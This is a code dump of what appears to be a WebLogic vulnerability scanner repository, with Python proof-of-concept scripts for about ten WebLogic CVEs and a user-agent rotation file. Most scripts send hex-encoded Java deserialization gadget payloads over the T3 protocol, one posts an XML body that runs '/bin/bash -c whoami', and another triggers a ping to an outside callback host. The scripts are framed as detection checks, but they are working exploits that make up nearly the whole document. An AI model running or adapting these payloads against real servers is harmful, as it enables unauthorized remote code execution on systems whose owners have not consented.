    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36",
    "Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
    "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"])

headers={"User-Agent":ua}

if __name__ == '__main__':
    print(headers)

--------------------------------------------------------------------------------
/poc/CVE_2014_4210.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\

'''
import sys
import requests
from config.config_requests import headers


def islive(ur,port):
    url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/'
    # timeout added so an unresponsive host cannot stall the whole scan
    r = requests.get(url, headers=headers, timeout=5)
    return r.status_code

def run(url,port):
    # The check is presence of the UDDI explorer web application, which is
    # the surface CVE-2014-4210 (SSRF) lives in.
    if islive(url,port)==200:
        u='http://' + str(url)+':'+str(port)+'/uddiexplorer/'
        return (1,"[+] [{}] Weblogic UDDI module is exposed! The path is: {}".format(url+':'+str(port),u))
    else:
        return (0,"[-] [{}] Weblogic UDDI module default path does not exist!".format(url+':'+str(port)))

if __name__=="__main__":
    url = sys.argv[1]
    port = int(sys.argv[2])
    print(run(url,port)[1])

--------------------------------------------------------------------------------
/poc/CVE_2016_0638.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\

'''
import socket
import sys
import time
import re


VUL=['CVE-2016-0638']
PAYLOAD=['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']
VER_SIG=['weblogic.jms.common.StreamMessageImpl']

def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    # T3 protocol greeting: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
    sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)

def buildT3RequestObject(sock,rport):
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(bytes.fromhex(d))
    time.sleep(2)

def sendEvilObjData(sock,data):
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # prefix the T3 message with its total length (4-byte header included)
    payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
    sock.send(bytes.fromhex(payload))
    res = ''
    try:
        count = 0
        while count<5:
            res += sock.recv(4096).decode("utf8","ignore")
            time.sleep(0.1)
            count += 1
    except Exception:
        pass
    return res

def checkVul(res,rip,rport):
    # The server's reply names the class it tried to deserialize; its presence
    # is the version signature this check keys on.
    p=re.findall(VER_SIG[0], res, re.S)
    if len(p)>0:
        return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0]))
    else:
        return (0,"[-] [{}] weblogic not detected {}".format(rip+':'+str(rport),VUL[0]))


def run(rip,rport):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    server_addr = (rip, rport)
    try:
        t3handshake(sock,server_addr)
        buildT3RequestObject(sock,rport)
        rs=sendEvilObjData(sock,PAYLOAD[0])
    finally:
        sock.close()  # release the T3 connection whether or not the check completed
    return checkVul(rs,rip,rport)

if __name__=="__main__":
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    print(run(dip,dport)[1])

--------------------------------------------------------------------------------
/poc/CVE_2016_3510.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\

'''
import socket
import sys
import time
import re


VUL=['CVE-2016-3510']
PAYLOAD=['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']
VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer']

def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    # T3 protocol greeting: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
    sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)

def buildT3RequestObject(sock,rport):
    data1 = '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'
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(bytes.fromhex(d))
    time.sleep(2)

def sendEvilObjData(sock,data):
    payload='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'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # prefix the T3 message with its total length (4-byte header included)
    payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
    sock.send(bytes.fromhex(payload))
    res = ''
    try:
        count = 0
        while count<5:
            res += sock.recv(4096).decode("utf8","ignore")
            time.sleep(0.1)
            count += 1
    except Exception:
        pass
    return res

def checkVul(res,rip,rport):
    # The server's reply names the class it tried to deserialize; its presence
    # is the version signature this check keys on.
    p=re.findall(VER_SIG[0], res, re.S)
    if len(p)>0:
        return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0]))
    else:
        return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0]))


def run(rip,rport):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    server_addr = (rip, rport)
    try:
        t3handshake(sock,server_addr)
        buildT3RequestObject(sock,rport)
        rs=sendEvilObjData(sock,PAYLOAD[0])
    finally:
        sock.close()  # release the T3 connection whether or not the check completed
    return checkVul(rs,rip,rport)

if __name__=="__main__":
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    print(run(dip,dport)[1])

--------------------------------------------------------------------------------
/poc/CVE_2017_10271.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\

'''
import sys
import requests
import re
from config.config_requests import ua

VUL=['CVE-2017-10271']
headers = {
    "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8",
    "User-Agent":ua,
    "Content-Type":"text/xml"
}
def poc(u):
    url = "http://" + u
    url += '/wls-wsat/CoordinatorPortType'
    post_str = '''

            /usr/sbin/ping

            ceye.com

    '''

    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)
        response = response.text
        # The check keys on the SOAP fault the endpoint returns for the request.
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception:
        response = ""

    if 'java.lang.ProcessBuilder' in response or "0" in response:
        return (1, '[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(u, VUL[0]))
    else:
        return (0, '[-] [{}] weblogic not detected {}'.format(u, VUL[0]))


def run(rip,rport):
    url=rip+':'+str(rport)
    return poc(url)

if __name__ == '__main__':
    dip = sys.argv[1]
    dport = int(sys.argv[2])
    print(run(dip,dport)[1])

--------------------------------------------------------------------------------
/poc/CVE_2017_3248.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\

'''
import socket
import sys
import time
import re

VUL=['CVE-2017-3248']
PAYLOAD=['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']
VER_SIG=['\\$Proxy[0-9]+']


def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    # T3 protocol greeting: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
    sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
    time.sleep(1)
    sock.recv(1024)

def buildT3RequestObject(sock,rport):
    data1 = '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'
    data2 =
'007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 30 | data3 = '1a7727000d3234322e323134' 31 | data4 = '2e312e32353461863d1d0000000078' 32 | for d in [data1,data2,data3,data4]: 33 | sock.send(bytes.fromhex(d)) 34 | time.sleep(2) 35 | 36 | def sendEvilObjData(sock,data): 37 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 38 | payload+=data 39 | 
payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 40 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 41 | sock.send(bytes.fromhex(payload)) 42 | res = '' 43 | try: 44 | count = 0 45 | while count<5: 46 | res += sock.recv(4096).decode("utf8","ignore") 47 | time.sleep(0.1) 48 | count += 1 49 | except Exception: 50 | pass 51 | return res 52 | 53 | def checkVul(res,rip,rport): 54 | p=re.findall(VER_SIG[0], res, re.S) 55 | if len(p)>0: 56 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 57 | else: 58 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 59 | 60 | 61 | def run(rip,rport): 62 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 63 | sock.settimeout(10) 64 | server_addr = (rip, rport) 65 | t3handshake(sock,server_addr) 66 | buildT3RequestObject(sock,rport) 67 | rs=sendEvilObjData(sock,PAYLOAD[0]) 68 | return checkVul(rs,rip,rport) 69 | 70 | if __name__=="__main__": 71 | dip = sys.argv[1] 72 | dport = int(sys.argv[2]) 73 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2017_3506.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 
9 | 10 | ''' 11 | import sys 12 | import requests 13 | import re 14 | from config.config_requests import ua 15 | 16 | VUL=['CVE-2017-3506'] 17 | headers = { 18 | "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", 19 | "User-Agent":ua, 20 | "Content-Type":"text/xml" 21 | } 22 | 23 | def poc(u): 24 | url = "http://" + u 25 | url += '/wls-wsat/CoordinatorPortType' 26 | post_str = ''' 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | /bin/bash 35 | 36 | 37 | -c 38 | 39 | 40 | whoami 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | ''' 51 | 52 | try: 53 | response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers) 54 | response = response.text 55 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 56 | except Exception: 57 | response = "" 58 | 59 | if 'java.lang.ProcessBuilder' in response or "0" in response: 60 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(u,VUL[0])) 61 | else: 62 | return (0,'[-] [{}] weblogic not detected {}'.format(u,VUL[0])) 63 | 64 | 65 | 66 | def run(rip,rport): 67 | url=rip+':'+str(rport) 68 | return poc(url) 69 | 70 | if __name__ == '__main__': 71 | dip = sys.argv[1] 72 | dport = int(sys.argv[2]) 73 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2018_2628.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import sys 13 | import time 14 | import re 15 | 16 | VUL=['CVE-2018-2628'] 17 | PAYLOAD=['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'] 18 | VER_SIG=['\\$Proxy[0-9]+'] 19 | 20 | 21 | def t3handshake(sock,server_addr): 22 | 
sock.connect(server_addr) 23 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 24 | time.sleep(1) 25 | sock.recv(1024) 26 | 27 | def buildT3RequestObject(sock,rport): 28 | data1 = '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' 29 | data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 30 | data3 = '1a7727000d3234322e323134' 31 | data4 = '2e312e32353461863d1d0000000078' 32 | for d in [data1,data2,data3,data4]: 33 | sock.send(bytes.fromhex(d)) 34 | time.sleep(2) 35 | 36 | def sendEvilObjData(sock,data): 37 | payload='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' 38 | payload+=data 39 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 40 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 41 | sock.send(bytes.fromhex(payload)) 42 | res = '' 43 | try: 44 | count = 0 45 | while count<10: 46 | res += sock.recv(4096).decode("utf8","ignore") 47 | time.sleep(0.1) 48 | count += 1 49 | except Exception: 50 | pass 51 | return res 52 | def checkVul(res,rip,rport): 53 | p=re.findall(VER_SIG[0], res, re.S) 54 | if len(p)>0: 55 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 56 | else: 57 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 58 | 59 | 60 | def run(rip,rport): 61 | sock 
= socket.socket(socket.AF_INET, socket.SOCK_STREAM) 62 | sock.settimeout(20) 63 | server_addr = (rip, rport) 64 | t3handshake(sock,server_addr) 65 | buildT3RequestObject(sock,rport) 66 | rs=sendEvilObjData(sock,PAYLOAD[0]) 67 | return checkVul(rs,rip,rport) 68 | 69 | if __name__=="__main__": 70 | dip = sys.argv[1] 71 | dport = int(sys.argv[2]) 72 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2018_2893.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import time 13 | import re 14 | import sys 15 | 16 | 17 | VUL=['CVE-2018-2893'] 18 |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| VER_SIG=['StreamMessageImpl'] 20 | 21 | 22 | def t3handshake(sock,server_addr): 23 | sock.connect(server_addr) 24 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 25 | time.sleep(1) 26 | sock.recv(1024) 27 | 28 | def buildT3RequestObject(sock,rport): 29 | data1 = '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' 30 | data2 = 
'007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 31 | data3 = '1a7727000d3234322e323134' 32 | data4 = '2e312e32353461863d1d0000000078' 33 | for d in [data1,data2,data3,data4]: 34 | sock.send(bytes.fromhex(d)) 35 | time.sleep(2) 36 | 37 | def sendEvilObjData(sock,data): 38 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 39 | payload+=data 40 | 
payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 41 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 42 | sock.send(bytes.fromhex(payload)) 43 | res = '' 44 | try: 45 | count = 0 46 | while count<5: 47 | res += sock.recv(4096).decode("utf8","ignore") 48 | time.sleep(0.1) 49 | count += 1 50 | except Exception: 51 | pass 52 | return res 53 | 54 | def checkVul(res,rip,rport): 55 | p=re.findall(VER_SIG[0], res, re.S) 56 | if len(p)>0: 57 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 58 | else: 59 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 60 | 61 | 62 | def run(rip,rport): 63 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 64 | sock.settimeout(10) 65 | server_addr = (rip, rport) 66 | t3handshake(sock,server_addr) 67 | buildT3RequestObject(sock,rport) 68 | rs=sendEvilObjData(sock,PAYLOAD[0]) 69 | return checkVul(rs,rip,rport) 70 | 71 | if __name__=="__main__": 72 | dip = sys.argv[1] 73 | dport = int(sys.argv[2]) 74 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2018_2894.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 
9 | 10 | ''' 11 | import sys 12 | import requests 13 | from config.config_requests import headers 14 | 15 | VUL=['CVE-2018-2894'] 16 | 17 | 18 | def islive(ur,port): 19 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/begin.do' 20 | r1 = requests.get(url, headers=headers) 21 | url='http://' + str(ur)+':'+str(port)+'/ws_utc/config.do' 22 | r2 = requests.get(url, headers=headers) 23 | return r1.status_code,r2.status_code 24 | 25 | def run(rip,rport): 26 | a,b=islive(rip,rport) 27 | if a == 200 or b == 200: 28 | return (1, '[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip + ':' + str(rport), VUL[0])) 29 | else: 30 | return (0, '[-] [{}] weblogic not detected {}'.format(rip + ':' + str(rport), VUL[0])) 31 | 32 | if __name__=="__main__": 33 | url = sys.argv[1] 34 | port = int(sys.argv[2]) 35 | run(url,port) 36 | -------------------------------------------------------------------------------- /poc/CVE_2019_2890.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | import socket 11 | import time 12 | import re 13 | import sys 14 | 15 | 16 | VUL=['CVE-2019-2890'] 17 | PAYLOAD=['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'] 18 | VER_SIG=['\\$Proxy[0-9]+'] 19 | 20 | 21 | def t3handshake(sock,server_addr): 22 | sock.connect(server_addr) 23 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 24 | time.sleep(1) 25 | sock.recv(1024) 26 | 27 | def buildT3RequestObject(sock,rport): 28 | data1 = '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' 29 | data2 = 
'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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 30 | data3 = '1a7727000d3234322e323134' 31 | data4 = '2e312e32353461863d1d0000000078' 32 | for d in [data1,data2,data3,data4]: 33 | sock.send(bytes.fromhex(d)) 34 | time.sleep(2) 35 | 36 | def sendEvilObjData(sock,data): 37 | payload='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' 38 | payload+=data 39 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 40 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 41 | sock.send(bytes.fromhex(payload)) 42 | res = '' 43 | try: 44 | count = 0 45 | while count<5: 46 | res += sock.recv(4096).decode("utf8","ignore") 47 | time.sleep(0.1) 48 | count += 1 49 | except Exception: 50 | pass 51 | return res 52 | 53 | def checkVul(res,rip,rport): 54 | p=re.findall(VER_SIG[0], res, re.S) 55 | if len(p)>0: 56 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 57 | else: 58 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 59 | 60 | 61 | def run(rip,rport): 62 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 63 | sock.settimeout(10) 64 | server_addr = (rip, rport) 65 | t3handshake(sock,server_addr) 66 | buildT3RequestObject(sock,rport) 67 | rs=sendEvilObjData(sock,PAYLOAD[0]) 68 | return checkVul(rs,rip,rport) 69 | 70 | if __name__=="__main__": 71 | 
